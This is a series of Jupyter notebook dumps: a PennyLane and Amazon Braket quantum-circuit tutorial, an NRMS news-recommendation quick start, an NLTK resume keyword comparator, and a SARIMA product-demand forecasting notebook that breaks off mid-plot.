print("Result of gradient calculation on SV1:", dcircuit(params))
###Output
Result of circuit run on SV1: -0.9999996577749632
Result of gradient calculation on SV1: (array([ 0.00041962, -0.000713 ]),)
###Markdown
Combining PennyLane with Amazon Braket What is PennyLane? PennyLane is a Python library for differentiable programming of quantum computers, allowing you to train a quantum computer the same way as a neural network.  PennyLane integrates with Amazon Braket to add additional features for quantum machine learning and optimization. This introductory tutorial walks you through how to train a quantum circuit using Amazon Braket simulators and PennyLane's automatic differentiation capabilities. Setup PennyLane is already installed on Braket notebook instances. On a local machine, PennyLane can be installed by following [these](https://pennylane.ai/install.html) instructions. It can then be imported with:
###Code
import pennylane as qml
from pennylane import numpy as np
###Output
_____no_output_____
###Markdown
To use Braket as a backend in PennyLane, we have to create a PennyLane device. Here we will first create a device that uses the local Braket simulator that runs on your local laptop (or on the server that hosts this notebook).
###Code
wires = 2 # Number of qubits
dev = qml.device("braket.local.qubit", wires=wires)
###Output
_____no_output_____
###Markdown
Below we will also show you how to scale out simulations to the AWS cloud. Defining a circuit We will choose a simple two-qubit circuit with two controllable rotations and a CNOT gate.
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
###Output
_____no_output_____
###Markdown
The ``qml.qnode(dev)`` decorator binds the circuit to the local Braket device. Now, every time that ``circuit()`` is called, the quantum computation defined in the function above will be executed with Braket. Note PennyLane also supports automatic differentiation with PyTorch and TensorFlow interfaces. The choice of interface can be specified using:@qml.qnode(dev, interface="<interface>"). Evaluating the circuit and accessing its gradient Let's set some values for our controllable parameters:
###Code
params = np.array([0.1, 0.2], requires_grad=True)
###Output
_____no_output_____
###Markdown
The circuit can be evaluated with these parameters using
###Code
print("Expectation value of circuit:", circuit(params))
print("Drawing of circuit:\n")
print(qml.draw(circuit)(params))
###Output
Drawing of circuit:
0: ──RX(0.1)──╭C──┤
1: ──RY(0.2)──╰X──┤ ⟨Z⟩
###Markdown
A crucial element of machine learning and optimization is accessing the gradient of a model with respect to its parameters. This functionality is built into PennyLane:
###Code
dcircuit = qml.grad(circuit)
###Output
_____no_output_____
###Markdown
Here, ``dcircuit`` is a callable function that evaluates the gradient of the circuit, i.e., its partial derivatives with respect to the controllable parameters.
###Code
dcircuit(params)
###Output
_____no_output_____
###Markdown
Training the circuit Suppose we now want to minimize the output of the circuit by updating its parameters. This can be done using gradient-based optimization.First, an optimizer is fixed:
###Code
opt = qml.GradientDescentOptimizer(stepsize=0.2)
###Output
_____no_output_____
###Markdown
The next step is to run the optimizer for a chosen number of iterations:
###Code
iterations = 50
costs = []
for i in range(iterations):
params, cost = opt.step_and_cost(circuit, params)
costs.append(cost)
# Visualize results
import matplotlib.pyplot as plt
costs.append(circuit(params))
plt.plot(costs)
plt.xlabel("Iterations")
plt.ylabel("Cost")
print("Minimized circuit output:", circuit(params))
print("Optimized parameters:", params)
###Output
Minimized circuit output: -0.9999996577749632
Optimized parameters: [4.19618503e-04 3.14087965e+00]
###Markdown
Note The circuit considered here is very simple and can be optimized easily by hand. However, the need for PennyLane's automatic differentiation capabilities becomes apparent as we make the problem more complicated, e.g., with more gates and different types of output measurement. In later demos, we will also see how Braket can be used to parallelize evaluation of the gradient, providing a turbocharger for quantum circuit training in PennyLane. Running circuits on Braket's managed simulator, SV1 So far we have used the local Braket simulator. This is a great choice for quick prototyping, but it is not suitable for large circuits with many qubits and does not provide a connection to quantum hardware.Amazon Braket also provides access to fully managed, high-performance simulators and quantum processing units (QPUs) from different [providers](https://aws.amazon.com/braket/hardware-providers/). These devices can be accessed through PennyLane by changing a single line of code, unlocking the potential for machine learning and optimization on quantum hardware and high performance simulators!Each remote Braket device can be selected through its [ARN](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). The supported devices on Braket are listed [here](https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html). For now, we will pick the managed SV1 simulator. Caution: Running hybrid algorithms on a QPU can take a long time and incur high usage fees charged to your AWS account.
###Code
device_arn = "arn:aws:braket:::device/quantum-simulator/amazon/sv1"
###Output
_____no_output_____
###Markdown
In PennyLane, all remote Braket devices are then accessed through a single PennyLane device named ``braket.aws.qubit``.
###Code
dev = qml.device('braket.aws.qubit', device_arn=device_arn, wires=2)
###Output
_____no_output_____
###Markdown
A follow up [tutorial](./1_Parallelized_optimization_of_quantum_circuits.ipynb) shows you how to use the remote device to run multiple circuits in parallel, while the [QAOA tutorial](./2_Graph_optimization_with_QAOA.ipynb) takes a deeper dive into graph optimization, including using SV1 to optimize a 20-node graph. Let's execute our circuit on SV1, as well as calculating the gradient:
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
dcircuit = qml.grad(circuit)
print("Result of circuit run on SV1:", circuit(params))
print("Result of gradient calculation on SV1:", dcircuit(params))
###Output
Result of circuit run on SV1: -0.9999996577749632
Result of gradient calculation on SV1: (array([ 0.00041962, -0.000713 ]),)
|
notebooks/00_quick_start/nrms_synthetic.ipynb | ###Markdown
Copyright (c) Microsoft Corporation. All rights reserved.Licensed under the MIT License. NRMS: Neural News Recommendation with Multi-Head Self-AttentionNRMS \[1\] is a neural news recommendation approach with multi-head self-attention. The core of NRMS is a news encoder and a user encoder. In the news encoder, multi-head self-attention is used to learn news representations from news titles by modeling the interactions between words. In the user encoder, we learn representations of users from their browsed news and use multi-head self-attention to capture the relatedness between the news. In addition, we apply additive attention to learn more informative news and user representations by selecting important words and news. Properties of NRMS:- NRMS is a content-based neural news recommendation approach.- It uses multi-head self-attention to learn news representations by modeling the interactions between words, and to learn user representations by capturing the relationships between the news a user browsed.- NRMS uses additive attention to learn informative news and user representations by selecting important words and news. Data format: train dataOne simple example: `1 0 0 0 0 Impression:0 User:2903 CandidateNews0:27006,11901,21668,9856,16156,21390,1741,2003,16983,8164 CandidateNews1:8377,10423,9960,5485,20494,7553,1251,17232,4745,9178 CandidateNews2:1607,26414,25830,16156,15337,16461,4004,6230,17841,10704 CandidateNews3:17323,20324,27855,16156,2934,14673,551,0,0,0 CandidateNews4:7172,3596,25442,21596,26195,4745,17988,16461,1741,76 ClickedNews0:11362,8205,22501,9349,12911,20324,1238,11362,26422,19185 ...`In general, each line in the data file represents one positive instance and n negative instances from the same impression. The format is: `[label0] ... [labeln] [Impression:i] [User:u] [CandidateNews0:w1,w2,w3,...] ... [CandidateNewsn:w1,w2,w3,...] [ClickedNews0:w1,w2,w3,...] ...`It contains several parts separated by spaces, i.e. the label part, the Impression part ``, the User part ``, the CandidateNews part, and the ClickedHistory part. The CandidateNews part describes the target news article we are going to score in this instance; it is represented by (aligned) title words. To take a quick example, a news title may be: `Trump to deliver State of the Union address next week`, then the title words value may be `CandidateNewsi:34,45,334,23,12,987,3456,111,456,432`. ClickedNewsk describes the k-th news article the user ever clicked, and the format is the same as for candidate news. Words are aligned in the news title. We use a fixed length to describe an article; if the title is shorter than the fixed length, we pad it with zeros. test dataOne simple example: `1 Impression:0 User:6446 CandidateNews0:18707,23848,13490,10948,21385,11606,1251,16591,827,28081 ClickedNews0:27838,7376,16567,28518,119,21248,7598,9349,20324,9349 ClickedNews1:7969,9783,1741,2549,27104,14669,14777,21343,7667,20324 ...`In general, each line in the data file represents one instance. The format is: `[label] [Impression:i] [User:u] [CandidateNews0:w1,w2,w3,...] [ClickedNews0:w1,w2,w3,...] ...` Global settings and imports
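To make the data format described above concrete, here is a small illustrative helper (not part of the recommenders library; the function name and return structure are assumptions made for this example) that splits one such line into its labels and named fields:

```python
def parse_line(line):
    """Split one data line of the format above into labels and named fields."""
    labels, fields = [], {}
    for token in line.strip().split(" "):
        if ":" in token:
            key, value = token.split(":", 1)
            # Word-id lists are comma separated; single values (Impression, User) stay as strings
            fields[key] = [int(w) for w in value.split(",")] if "," in value else value
        elif token != "...":
            labels.append(int(token))
    return labels, fields

labels, fields = parse_line(
    "1 0 0 0 0 Impression:0 User:2903 "
    "CandidateNews0:27006,11901,21668,9856,16156,21390,1741,2003,16983,8164 "
    "ClickedNews0:11362,8205,22501,9349,12911,20324,1238,11362,26422,19185"
)
print(labels)                        # [1, 0, 0, 0, 0]
print(fields["User"])                # '2903'
print(fields["CandidateNews0"][:3])  # [27006, 11901, 21668]
```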
###Code
import sys
sys.path.append("../../")
from reco_utils.recommender.deeprec.deeprec_utils import download_deeprec_resources
from reco_utils.recommender.newsrec.newsrec_utils import prepare_hparams
from reco_utils.recommender.newsrec.models.nrms import NRMSModel
from reco_utils.recommender.newsrec.io.news_iterator import NewsIterator
import papermill as pm
from tempfile import TemporaryDirectory
import tensorflow as tf
import os
print("System version: {}".format(sys.version))
print("Tensorflow version: {}".format(tf.__version__))
tmpdir = TemporaryDirectory()
###Output
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:523: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint8 = np.dtype([("qint8", np.int8, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:524: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_quint8 = np.dtype([("quint8", np.uint8, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint16 = np.dtype([("qint16", np.int16, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:526: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_quint16 = np.dtype([("quint16", np.uint16, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:527: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint32 = np.dtype([("qint32", np.int32, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:532: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
np_resource = np.dtype([("resource", np.ubyte, 1)])
###Markdown
Download and load data
###Code
data_path = tmpdir.name
yaml_file = os.path.join(data_path, r'nrms.yaml')
train_file = os.path.join(data_path, r'train.txt')
valid_file = os.path.join(data_path, r'test.txt')
wordEmb_file = os.path.join(data_path, r'embedding.npy')
if not os.path.exists(yaml_file):
download_deeprec_resources(r'https://recodatasets.blob.core.windows.net/newsrec/', data_path, 'nrms.zip')
###Output
100%|██████████| 21.2k/21.2k [00:01<00:00, 12.5kKB/s]
###Markdown
Create hyper-parameters
###Code
epochs=10
seed=42
hparams = prepare_hparams(yaml_file, wordEmb_file=wordEmb_file, epochs=epochs)
print(hparams)
iterator = NewsIterator
###Output
_____no_output_____
###Markdown
Train the NRMS model
###Code
model = NRMSModel(hparams, iterator, seed=seed)
print(model.run_eval(valid_file))
model.fit(train_file, valid_file)
res_syn = model.run_eval(valid_file)
print(res_syn)
pm.record("res_syn", res_syn)
###Output
{'group_auc': 0.5845, 'mean_mrr': 0.202, 'ndcg@5': 0.1977, 'ndcg@10': 0.2655}
|
Code/.ipynb_checkpoints/Resume - Job Description Comparator-checkpoint.ipynb | ###Markdown
Simple Job Description to Resume ComparatorThis program compares the words found in a job description to the words in a resume. The current version compares all words and gives a naive percentage match.Many employers use software to analyze applicant resumes. It is better to have as many terms in the resume that match those in the job description.
###Code
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.corpus import stopwords
import codecs
from nltk.stem.wordnet import WordNetLemmatizer
lem = WordNetLemmatizer()
# NLTK's default english stopwords
default_stopwords = stopwords.words('english')
#File Locations
document_folder = '../data/'
resume_file = document_folder + 'resume.txt'
job_description_file = document_folder + 'job_description.txt'
custom_stopwords_file = document_folder + 'custom_stopwords.txt'
custom_stopwords = codecs.open(custom_stopwords_file, 'r', 'utf-8').read().splitlines()
all_stopwords = list(map(str.lower,set(default_stopwords + custom_stopwords)))
minimum_word_length = 2
desired_parts_of_speach = set(['NN', 'NNP', 'NNS', 'NNPS'])
def process_text(text, stop_words, pos_filter=(), lemmatizer=None):
    tokens = word_tokenize(text)
    tags = pos_tag(tokens)
    lem = lemmatizer
    # Keep only tokens whose part-of-speech tag is in the requested filter (if any)
    if len(pos_filter) > 0:
        tokens = [w for w, tag in tags if tag in pos_filter]
    words = [t for t in tokens if t.isalpha()]
    words = [w for w in words if len(w) >= minimum_word_length]
    words = [w for w in words if not w.isnumeric()]
    # Lowercase before removing stopwords, since the stopword list is lowercased
    words = [w.lower() for w in words]
    words = [w for w in words if w not in stop_words]
    if lem is not None:
        words = [lem.lemmatize(w) for w in words]
    return words
f_resume=open(resume_file,'r',)
f_desc = open(job_description_file,'r')
raw_resume =f_resume.read()
raw_desc = f_desc.read()
resume_words = process_text(raw_resume,all_stopwords,desired_parts_of_speach,lem)
job_words = process_text(raw_desc,all_stopwords,desired_parts_of_speach,lem)
resume_set = set(resume_words)
job_set = set(job_words)
matching_words = resume_set.intersection(job_set)
print('Your resume matches at ', "{0:.0%}".format(len(matching_words)/len(job_words)))
print('Your resume is missing the following words (naive): ',job_set-resume_set)
###Output
You resume matches at 22%
Your resume is missing the following words (naive): {'literally', 'turning', 'deep', 'absolute', 'directly', 'background', 'scientist', 'large', 'stability', 'providing', 'individual', 'user', 'behalf', 'scale', 'warehouse', 'like', 'primary', 'insight', 'knowledge', 'excellent', 'current', 'inc', 'upload', 'internal', 'seeking', 'pipeline', 'champion', 'this', 'array', 'bachelor', 'writing', 'responsibility', 'understand', 'computer', 'working', 'join', 'enables', 'degree', 'leader', 'power', 'build', 'id', 'taking', 'analyze', 'answer', 'creative', 'enhance', 'passionate', 'influence', 'identify', 'unstructured', 'job', 'our', 'engine', 'pipe', 'environment', 'highly', 'solution', 'find', 'well', 'structured', 'higher', 'presenting', 'are', 'experienced', 'question', 'play', 'news', 'matter', 'extracting', 'relevant', 'complex', 'similar', 'track', 'qualification', 'deliver', 'person', 'alexa', 'validate', 'ensure', 'music', 'description', 'best', 'tool', 'select', 'come', 'solver', 'transform', 'recognition', 'communicate', 'proficiency', 'finding', 'brain', 'name', 'extract', 'communicating', 'structure', 'excited', 'verbally', 'goal', 'record', 'information', 'manipulating', 'obsessed', 'use', 'basic', 'field', 'action', 'shaping', 'strong', 'perfect', 'ideal', 'file', 'echo', 'ownership', 'innovating', 'dsme', 'scenario', 'voice'}
|
Product Demand Forecasting/Seasonal_demand_forecast.ipynb | ###Markdown
Product Demand ForecastingThis is a Time Series Forecasting practice with ARIMA. The goal here is to use historical product data to forecast the demand in the future.Reference: https://www.kaggle.com/kashdotten/forecast-order-demand-seasonalarima
###Code
import itertools
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
%matplotlib inline
from scipy.stats import norm, skew
from scipy import stats #qqplot
import statsmodels.api as sm #for decomposing the trends, seasonality etc.
from statsmodels.tsa.statespace.sarimax import SARIMAX
###Output
_____no_output_____
###Markdown
1. Load data and cleaningLet's load the data file and check the shape and types of data we have.
###Code
df = pd.read_csv('Historical-Product-Demand.csv', parse_dates=['Date'])
df.head()
df.shape
df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1048575 entries, 0 to 1048574
Data columns (total 5 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Product_Code 1048575 non-null object
1 Warehouse 1048575 non-null object
2 Product_Category 1048575 non-null object
3 Date 1037336 non-null datetime64[ns]
4 Order_Demand 1048575 non-null object
dtypes: datetime64[ns](1), object(4)
memory usage: 40.0+ MB
###Markdown
Check for NaN values. Only 1 column has NaN values, and they account for only 1% of the data. It is safe to drop these.
###Code
# Check any number of columns with NaN
print(df.isnull().any().sum(), '/', len(df.columns))
# Check any number of data points with NaN
print(df.isnull().any(axis=1).sum(), '/', len(df))
df.dropna(axis=0, inplace=True)
df = df.reset_index(drop=True)
df = df.sort_values('Date')
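# Order_Demand is read in as text and some values are wrapped in parentheses; strip them so the column can be cast to int below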
df['Order_Demand'] = df['Order_Demand'].str.strip('()')
df['Order_Demand'] = df['Order_Demand'].astype('int64')
#Get the lowest and highest dates in the dataset.
df['Date'].min() , df['Date'].max()
#Lets start with 2012 and cap it 2016 december. Since the dates before 2012 have a lot of missing values - inspected and checked using basic time series plot.
df = df[(df['Date']>='2012-01-01') & (df['Date']<='2016-12-31')].sort_values('Date', ascending=True)
###Output
_____no_output_____
###Markdown
2. Exploratory Data AnalysisWe first explore the features individually, starting with warehouse. Here we sort the warehouses by shipment counts.
###Code
df['Warehouse'].value_counts().sort_values(ascending = False)
###Output
_____no_output_____
###Markdown
Here we sort the warehouses by sum of orders. Warehouse J ships the most orders, while warehouse S ships more orders in fewer shipments.
###Code
df.groupby('Warehouse').sum().sort_values('Order_Demand', ascending = False)
###Output
_____no_output_____
###Markdown
We then look at the product category feature. There are 33 categories. From the count plot, category 19 has the most orders.
###Code
print(df['Product_Category'].unique())
print(len(df['Product_Category'].unique()))
rcParams['figure.figsize'] = 50,14
sns.countplot(df['Product_Category'].sort_values(ascending = True))
###Output
_____no_output_____
###Markdown
Now let's see how these features interact with the order demand. Again, we start with the warehouse feature.
###Code
sns.boxplot(df['Warehouse'],df['Order_Demand'])
###Output
_____no_output_____
###Markdown
Where are the boxes? Let's apply a log transformation to the order demand feature.
###Code
sns.boxplot(df['Warehouse'], np.log1p(df['Order_Demand']))
###Output
_____no_output_____
###Markdown
Now with product category, we sample a subset of data to deal with the memory issue. Again, we apply a log transformation to the order demand feature.
###Code
rcParams['figure.figsize'] = 50,12
df_temp = df.sample(n=20000).reset_index()
fig5 = sns.boxplot( df_temp['Product_Category'].sort_values(),np.log1p(df_temp['Order_Demand']))
###Output
_____no_output_____
###Markdown
3. Time series analysisWe can first sum the total order demand for each day.
###Code
df = df.groupby('Date')['Order_Demand'].sum().reset_index()
df.head()
###Output
_____no_output_____
###Markdown
We use the date as index here for resampling later.
###Code
df = df.set_index('Date')
df.index
###Output
_____no_output_____
###Markdown
Let's average daily order demand for each month.
###Code
y = df['Order_Demand'].resample('MS').mean()
y.plot(figsize=(12,5))
plt.show()
###Output
_____no_output_____
###Markdown
We can use statsmodels' time series analysis library to decompose our data into additive components. 4 plots are shown below, with the top one being the original time series. The data is decomposed into 3 components here: Trend, seasonal, and residual.
###Code
rcParams['figure.figsize'] = 18, 8
decomposition = sm.tsa.seasonal_decompose(y, model='additive')
fig = decomposition.plot()
plt.show()
###Output
_____no_output_____
###Markdown
SARIMA: Seasonal Autoregressive Integrated Moving Average. The terms are AR: autoregression, I: differencing, and MA: moving average; the seasonal period of 12 is for monthly data. More information can be found in this quick start [tutorial](https://machinelearningmastery.com/sarima-for-time-series-forecasting-in-python/) and this gridsearch SARIMA [tutorial](https://machinelearningmastery.com/how-to-grid-search-sarima-model-hyperparameters-for-time-series-forecasting-in-python/). Documentation [here](https://www.statsmodels.org/stable/generated/statsmodels.tsa.statespace.sarimax.SARIMAX.html#statsmodels.tsa.statespace.sarimax.SARIMAX).
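For reference (a standard formulation, not taken from the original notebook), a SARIMA(p, d, q)x(P, D, Q, s) model can be written with the backshift operator $B$ as:

$$\Phi_P(B^s)\,\phi_p(B)\,(1-B)^d(1-B^s)^D\,y_t = \Theta_Q(B^s)\,\theta_q(B)\,\varepsilon_t$$

where $\phi_p$ and $\theta_q$ are the non-seasonal AR and MA polynomials, $\Phi_P$ and $\Theta_Q$ their seasonal counterparts, $s$ the seasonal period (12 for monthly data), and $\varepsilon_t$ white noise.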
###Code
p = d = q = range(0, 2)
pdq = list(itertools.product(p, d, q))
seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]
print('Examples of parameter combinations for Seasonal ARIMA...')
print('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[1]))
print('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[2]))
print('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[3]))
print('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[4]))
###Output
Examples of parameter combinations for Seasonal ARIMA...
SARIMAX: (0, 0, 1) x (0, 0, 1, 12)
SARIMAX: (0, 0, 1) x (0, 1, 0, 12)
SARIMAX: (0, 1, 0) x (0, 1, 1, 12)
SARIMAX: (0, 1, 0) x (1, 0, 0, 12)
###Markdown
Below is a manual grid search over the parameters for seasonal ARIMA. The Akaike information criterion (AIC) is an estimator of the relative quality of statistical models for a given set of data. AIC measures how well a model fits the data while taking into account the overall complexity of the model. A large AIC indicates that the model needs many parameters to fit the data well; a small AIC indicates that a similar fit is achieved with fewer parameters. Hence, the lower the AIC, the better.
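For reference, the standard definition (not from the original notebook) is

$$\mathrm{AIC} = 2k - 2\ln(\hat{L})$$

where $k$ is the number of estimated parameters and $\hat{L}$ is the maximized likelihood of the model, so lower values indicate a better complexity/fit trade-off.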
###Code
#The code tests the given params using sarimax and outputs the AIC scores.
for param in pdq:
for param_seasonal in seasonal_pdq:
try:
mod = sm.tsa.statespace.SARIMAX(y,
order=param,
seasonal_order=param_seasonal,
enforce_stationarity=False,
enforce_invertibility=False)
results = mod.fit()
print('SARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))
except:
continue
###Output
SARIMA(0, 0, 0)x(0, 0, 0, 12)12 - AIC:1932.23655778549
SARIMA(0, 0, 0)x(0, 0, 1, 12)12 - AIC:1512.927583212436
SARIMA(0, 0, 0)x(0, 1, 0, 12)12 - AIC:1338.8201294951011
SARIMA(0, 0, 0)x(0, 1, 1, 12)12 - AIC:3023.482324073208
SARIMA(0, 0, 0)x(1, 0, 0, 12)12 - AIC:1366.5117513512635
SARIMA(0, 0, 0)x(1, 0, 1, 12)12 - AIC:1340.8450308457734
SARIMA(0, 0, 0)x(1, 1, 0, 12)12 - AIC:1023.6756022859485
SARIMA(0, 0, 0)x(1, 1, 1, 12)12 - AIC:3064.958350052849
SARIMA(0, 0, 1)x(0, 0, 0, 12)12 - AIC:1862.087487804522
SARIMA(0, 0, 1)x(0, 0, 1, 12)12 - AIC:1471.1838032700691
SARIMA(0, 0, 1)x(0, 1, 0, 12)12 - AIC:1305.3289813345486
SARIMA(0, 0, 1)x(0, 1, 1, 12)12 - AIC:2942.2244097097573
SARIMA(0, 0, 1)x(1, 0, 0, 12)12 - AIC:1529.1005721650718
SARIMA(0, 0, 1)x(1, 0, 1, 12)12 - AIC:1467.6395590277853
SARIMA(0, 0, 1)x(1, 1, 0, 12)12 - AIC:1020.6347629759119
SARIMA(0, 0, 1)x(1, 1, 1, 12)12 - AIC:3009.0925627524493
SARIMA(0, 1, 0)x(0, 0, 0, 12)12 - AIC:1648.7378898187837
SARIMA(0, 1, 0)x(0, 0, 1, 12)12 - AIC:1309.8653292101988
SARIMA(0, 1, 0)x(0, 1, 0, 12)12 - AIC:1318.7588141990293
SARIMA(0, 1, 0)x(0, 1, 1, 12)12 - AIC:2962.7208822328053
SARIMA(0, 1, 0)x(1, 0, 0, 12)12 - AIC:1331.924340756696
SARIMA(0, 1, 0)x(1, 0, 1, 12)12 - AIC:1315.7243994326866
SARIMA(0, 1, 0)x(1, 1, 0, 12)12 - AIC:998.700939745945
SARIMA(0, 1, 0)x(1, 1, 1, 12)12 - AIC:2821.242692855516
SARIMA(0, 1, 1)x(0, 0, 0, 12)12 - AIC:1590.336917752371
SARIMA(0, 1, 1)x(0, 0, 1, 12)12 - AIC:1258.4897692522463
SARIMA(0, 1, 1)x(0, 1, 0, 12)12 - AIC:1272.6101180952069
SARIMA(0, 1, 1)x(0, 1, 1, 12)12 - AIC:2874.329382437139
SARIMA(0, 1, 1)x(1, 0, 0, 12)12 - AIC:1312.2056245504862
SARIMA(0, 1, 1)x(1, 0, 1, 12)12 - AIC:1257.3483691459887
SARIMA(0, 1, 1)x(1, 1, 0, 12)12 - AIC:989.7075794133763
SARIMA(0, 1, 1)x(1, 1, 1, 12)12 - AIC:2737.840668378898
SARIMA(1, 0, 0)x(0, 0, 0, 12)12 - AIC:1680.3876682174587
SARIMA(1, 0, 0)x(0, 0, 1, 12)12 - AIC:1337.118044296482
SARIMA(1, 0, 0)x(0, 1, 0, 12)12 - AIC:1332.0586593038347
SARIMA(1, 0, 0)x(0, 1, 1, 12)12 - AIC:3025.2236284647324
SARIMA(1, 0, 0)x(1, 0, 0, 12)12 - AIC:1334.1893088021352
SARIMA(1, 0, 0)x(1, 0, 1, 12)12 - AIC:1335.3199395698064
SARIMA(1, 0, 0)x(1, 1, 0, 12)12 - AIC:990.0724002186286
SARIMA(1, 0, 0)x(1, 1, 1, 12)12 - AIC:3093.9996683616214
SARIMA(1, 0, 1)x(0, 0, 0, 12)12 - AIC:1621.1081438130254
SARIMA(1, 0, 1)x(0, 0, 1, 12)12 - AIC:1287.3358941928989
SARIMA(1, 0, 1)x(0, 1, 0, 12)12 - AIC:1302.1688057383137
SARIMA(1, 0, 1)x(0, 1, 1, 12)12 - AIC:2935.6645809631004
SARIMA(1, 0, 1)x(1, 0, 0, 12)12 - AIC:1339.1695079810452
SARIMA(1, 0, 1)x(1, 0, 1, 12)12 - AIC:1288.2892745671836
SARIMA(1, 0, 1)x(1, 1, 0, 12)12 - AIC:987.780252041274
SARIMA(1, 0, 1)x(1, 1, 1, 12)12 - AIC:3002.5327340057925
SARIMA(1, 1, 0)x(0, 0, 0, 12)12 - AIC:1636.5498182934678
SARIMA(1, 1, 0)x(0, 0, 1, 12)12 - AIC:1297.9161854329018
SARIMA(1, 1, 0)x(0, 1, 0, 12)12 - AIC:1309.6529019605618
SARIMA(1, 1, 0)x(0, 1, 1, 12)12 - AIC:2968.048279238306
SARIMA(1, 1, 0)x(1, 0, 0, 12)12 - AIC:1295.0340856103091
SARIMA(1, 1, 0)x(1, 0, 1, 12)12 - AIC:1296.3640593636949
SARIMA(1, 1, 0)x(1, 1, 0, 12)12 - AIC:963.4491531777289
SARIMA(1, 1, 0)x(1, 1, 1, 12)12 - AIC:2827.36293748133
SARIMA(1, 1, 1)x(0, 0, 0, 12)12 - AIC:1592.0766231790378
SARIMA(1, 1, 1)x(0, 0, 1, 12)12 - AIC:1260.0654223247143
SARIMA(1, 1, 1)x(0, 1, 0, 12)12 - AIC:1274.0946916151815
SARIMA(1, 1, 1)x(0, 1, 1, 12)12 - AIC:2876.326516434194
SARIMA(1, 1, 1)x(1, 0, 0, 12)12 - AIC:1285.44377400188
SARIMA(1, 1, 1)x(1, 0, 1, 12)12 - AIC:1259.178188415773
SARIMA(1, 1, 1)x(1, 1, 0, 12)12 - AIC:960.5164122018635
SARIMA(1, 1, 1)x(1, 1, 1, 12)12 - AIC:2739.8378023759533
###Markdown
The next iteration of this method would involve using a pre-built grid-search pipeline like the one in scikit-learn. The best parameters from this round are found to be SARIMA(1, 1, 1)x(1, 1, 0, 12) with an AIC of about 960.52. We use these parameters in SARIMAX below.
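As a sketch of that next iteration (an illustration only, assuming scikit-learn is installed; it reuses `y`, `pdq`, and `seasonal_pdq` from above and keeps the model itself unchanged), the nested loops could be organised with sklearn's `ParameterGrid`:

```python
from sklearn.model_selection import ParameterGrid

param_grid = ParameterGrid({'order': pdq, 'seasonal_order': seasonal_pdq})
aic_results = []
for cfg in param_grid:
    try:
        fitted = sm.tsa.statespace.SARIMAX(y,
                                           order=cfg['order'],
                                           seasonal_order=cfg['seasonal_order'],
                                           enforce_stationarity=False,
                                           enforce_invertibility=False).fit(disp=False)
        aic_results.append((fitted.aic, cfg))
    except Exception:
        continue

# Pick the configuration with the lowest AIC
best_aic, best_cfg = min(aic_results, key=lambda t: t[0])
print(best_aic, best_cfg)
```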
###Code
mod = sm.tsa.statespace.SARIMAX(y,
order=(1, 1, 1),
seasonal_order=(1, 1, 0, 12),
enforce_stationarity=False,
enforce_invertibility=False)
results = mod.fit()
print(results.summary().tables[1])
###Output
==============================================================================
coef std err z P>|z| [0.025 0.975]
------------------------------------------------------------------------------
ar.L1 -0.2450 0.368 -0.666 0.505 -0.966 0.476
ma.L1 -0.4385 0.325 -1.348 0.178 -1.076 0.199
ar.S.L12 -0.4568 0.208 -2.192 0.028 -0.865 -0.048
sigma2 1.018e+11 9.55e-13 1.06e+23 0.000 1.02e+11 1.02e+11
==============================================================================
###Markdown
Let's plot the diagnostics. What should we expect? 1. The residuals should be normally distributed. Top right: the orange KDE line should closely match the green N(0,1) (normal distribution with zero mean and unit variance) line. Bottom left: the qq plot shows the ordered distribution of residuals, which follows the linear trend of samples taken from N(0,1). 2. The residuals should not be correlated. Top left: the standardized residuals do not display seasonality and appear to be noise. Bottom right: the autocorrelation (correlogram) plot shows that the time series residuals have low correlation with their own lagged versions.
###Code
results.plot_diagnostics(figsize=(16, 8))
plt.show()
###Output
_____no_output_____
###Markdown
4. ValidationWe can use a subset of the data to validate our time series model. Here we choose the data starting from April 2015. The one-step-ahead prediction fits the observed data well. The confidence interval defaults to 95%.
###Code
pred = results.get_prediction(start=pd.to_datetime('2015-04-01'), dynamic=False) #false is when using the entire history.
pred_ci = pred.conf_int()
ax = y['2013':].plot(label='observed')
pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))
ax.fill_between(pred_ci.index,
pred_ci.iloc[:, 0],
